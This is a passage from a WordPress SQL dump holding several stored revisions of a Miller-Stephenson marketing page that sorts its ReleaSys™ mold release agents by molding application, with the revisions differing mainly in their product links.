max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 17:50:33', '2017-06-01 17:50:33', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4409, 2, '2017-06-01 18:13:35', '2017-06-01 18:13:35', '', 'palatialhouse-tofu-1', '', 'inherit', 'closed', 'closed', '', 'palatialhouse-tofu-1', '', '', '2017-06-01 18:13:35', '2017-06-01 18:13:35', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/06/palatialhouse-tofu-1.mp4', 0, 'attachment', 'video/mp4', 0); 
INSERT INTO `wp_posts` VALUES (4410, 2, '2017-06-01 18:31:03', '2017-06-01 18:31:03', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)" hover="glow" effect="sparkle"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 18:31:03', '2017-06-01 18:31:03', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4411, 2, '2017-06-01 18:31:53', '2017-06-01 18:31:53', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)" hover="glow" effect="sparkle"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 18:31:53', '2017-06-01 18:31:53', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4412, 2, '2017-06-01 18:33:06', '2017-06-01 18:33:06', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)" hover="glow" effect="sparkle"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 18:33:06', '2017-06-01 18:33:06', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4413, 2, '2017-06-01 18:33:34', '2017-06-01 18:33:34', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)" hover="glow" effect="sparkle"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" 